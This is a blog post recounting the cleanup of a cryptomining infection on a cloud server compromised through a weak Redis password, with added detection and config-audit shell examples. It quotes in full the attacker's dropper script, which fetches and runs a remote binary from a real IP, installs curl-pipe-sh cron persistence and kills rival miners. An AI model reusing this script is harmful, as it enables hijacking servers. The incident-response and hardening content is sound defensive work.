Emmm, to make a long story short: my Aliyun server got hijacked as a mining machine.

Background

It all started two or three days ago. On 7-31 Aliyun sent me a text message.

I even asked friends specifically what kind of ghost logic this (feng)Root thing was, and then thought no more of it. The server is just for my own tinkering; during development it exposes an API to the front end, and there is no important data on it. And then:

The same text message came again on 8-2. What? My macho pride kicked in: this guy was going a bit too far, and it looked a bit more serious, so I decided to take a look. (My first thought was to check the processes for anything wrong.)

Take a look

WTF, shameless: 99.3% CPU usage, leaving me 0.7%.

Go into the .ssh directory and take a look:
[root@FantJ .ssh]# ls
authorized_keys

This is a key for passwordless login! It is used for password-free SSH between hosts, and it is not mine. Delete it decisively.

Find out where the binary lives:
[root@FantJ ~]# find / -name 'qW3xT*'
/tmp/qW3xT.2
Caught it.

Why I suspected it:

  1. The PID is large, which shows it is a recently started process.
  2. Every time I kill the miner, this one runs and then disappears. (This will be confirmed later.)
  3. Judging by the CPU pattern, the load is roughly steady; it is not being driven by new instructions.

Kill related processes

 1022  ps -aux | grep ddg
 1023  kill 11938
 1024  kill 27507

Looking for ddgs.3013

[root@FantJ ~]# find / -name ddgs.3013
/tmp/ddgs.3013

Scheduled tasks?

I didn't think it was fully cleaned up, so I thought I'd go and check the scheduled tasks.

[root@FantJ tmp]# crontab -l
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

Emmm, what an exciting and joyful moment.

A quick look at the curl options used here (I had to Baidu them too). From curl --help:

 -f, --fail          Fail silently (no output at all) on HTTP errors (H)
 -s, --silent        Silent mode. Don't output anything
     --socks4 HOST[:PORT]  SOCKS4 proxy on given host + port
     --socks4a HOST[:PORT]  SOCKS4a proxy on given host + port
     --socks5 HOST[:PORT]  SOCKS5 proxy on given host + port
     --socks5-hostname HOST[:PORT]  SOCKS5 proxy, pass host name to proxy
     --socks5-gssapi-service NAME  SOCKS5 proxy service name for GSS-API
     --socks5-gssapi-nec  Compatibility with NEC SOCKS5 server
 -S, --show-error    Show error. With -s, make curl show errors when they occur
 -L, --location      Follow redirects (H)
     --location-trusted like --location and send auth to other hosts (H)

Remove the scheduled task:
[root@FantJ tmp]# crontab -r 
[root@FantJ tmp]# crontab -l
no crontab for root

Then I wanted to check i.sh. I suddenly remembered that this is exactly what the scheduled task was running, so I ran the following:

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root


mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root


ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

Note that this command only prints the script; it does not execute it, because I dropped the "| sh" pipe. All you see is the script's content. To summarize what this script does:

  1. Sets the PATH and writes the scheduled task into both cron spool locations.
  2. Checks for the ddgs.3013 process; if it isn't running, re-downloads the file, gives it execute permission, and runs it.
  3. Batch-kills processes by keyword.
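As an added example (my own code, not the author's or the script's), here is a small POSIX shell check that flags the persistence trick this script relies on: a crontab entry that pipes a curl or wget download straight into sh. The sample crontab it runs against is constructed here, with the entry from the post dropped in among two normal jobs; the --live branch is an assumption about where to look on a real host.

```shell
#!/bin/sh
# Added example, not from the original post: flag crontab entries that
# fetch a remote script and pipe it straight into a shell, the persistence
# trick i.sh uses to reinstall itself every 15 minutes.

# find_curl_pipe_sh: read crontab text on stdin, print matching lines.
# Exit status follows grep: 0 if something matched, 1 if nothing did.
find_curl_pipe_sh() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' |
        grep -E '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba)?sh([[:space:]]|$)'
}

# count_suspicious: number of flagged lines in the crontab text given as $1.
count_suspicious() {
    printf '%s\n' "$1" | find_curl_pipe_sh | wc -l | tr -d ' '
}

# Constructed sample: the entry found in the post among two normal jobs.
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
30 4 * * 0 /usr/bin/certbot renew'

if [ "${1:-}" = "--live" ]; then
    # Assumed locations on a real host: the current user's crontab plus the
    # spool files that i.sh writes to directly (errors for missing paths hidden).
    { crontab -l; cat /var/spool/cron/* /var/spool/cron/crontabs/*; } 2>/dev/null |
        find_curl_pipe_sh
else
    printf '%s\n' "$SAMPLE_CRON" | find_curl_pipe_sh
fi
```

Run it with no arguments to see the constructed sample flagged, or with --live to check the host you are sitting on.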

I noticed the grep for minexmr.com. Look it up: it is a mining pool, and the same goes for the other sites.

Reflection

Problem solved. I watched the processes for a while afterwards and nothing came back, so I can say the cleanup was fairly thorough. So why did this problem arise in the first place?

Back to the hint Aliyun gave me: Redis. Since I was just playing around, I had set the Redis password to a very simple "root", which is very easy for scanners to pick up, and so here we are. I have now corrected the password. Set bind to your own IP, set a password (via requirepass in the config file, or redis-cli 'config set requirepass XXXX'), and, more securely, change the default port. I don't have any important data, so I'll keep it simple for now and do it properly next time.
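As an added example (not the author's configuration), a shell function that audits a redis.conf for the weaknesses in this story: an unset or short requirepass, a bind that exposes the service to every interface, and the default port; the protected-mode check is an extra I added, since Redis 3.2 and later refuses remote connections when neither bind nor a password is configured. The two sample configs are constructed for the demo, one modelled on the author's setup and one hardened as the paragraph above suggests.

```shell
#!/bin/sh
# Added example, not from the original post: audit a redis.conf (read on
# stdin) for the settings behind this incident and print one finding per line.

audit_redis_conf() {
    # Drop comments and blank lines, then pull out the directives we care about.
    conf=$(grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$')
    bind=$(printf '%s\n' "$conf" | awk '$1=="bind"{$1="";print}')
    pass=$(printf '%s\n' "$conf" | awk '$1=="requirepass"{print $2}')
    port=$(printf '%s\n' "$conf" | awk '$1=="port"{print $2}')
    pmode=$(printf '%s\n' "$conf" | awk '$1=="protected-mode"{print $2}')

    # No bind line means "listen everywhere", as do 0.0.0.0 and "*".
    case "$bind" in
        ''|*0.0.0.0*|*'*'*) echo "bind: listens on all interfaces; bind to 127.0.0.1 or the app's private IP" ;;
    esac
    if [ -z "$pass" ]; then
        echo "requirepass: not set; anyone who can reach the port has full access"
    elif [ "${#pass}" -lt 16 ]; then
        echo "requirepass: '$pass' is too short; use a long random string"
    fi
    [ "${port:-6379}" = "6379" ] && echo "port: default 6379; scanners sweep it first, consider changing it"
    [ "${pmode:-yes}" = "no" ] && echo "protected-mode: disabled; leave it on unless bind and requirepass are set"
    return 0
}

# count_findings: number of findings for the config text given as $1.
count_findings() {
    printf '%s\n' "$1" | audit_redis_conf | wc -l | tr -d ' '
}

# Constructed sample modelled on the author's setup: exposed, default port, password "root".
WEAK_CONF='port 6379
bind 0.0.0.0
protected-mode no
requirepass root'

# Constructed hardened sample: private bind, non-default port, long placeholder password.
HARDENED_CONF='port 16379
bind 10.0.0.5 127.0.0.1
protected-mode yes
requirepass a-long-random-secret-placeholder-change-me'

printf '%s\n' "$WEAK_CONF" | audit_redis_conf
```

On a real host, feed it the live file: audit_redis_conf < /etc/redis.conf (or wherever your distribution keeps it).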

However, this guy was pretty conscientious in his operation: he didn't delete my Redis keys, very professional ethics. But my server still ended up as a slave mining money for him.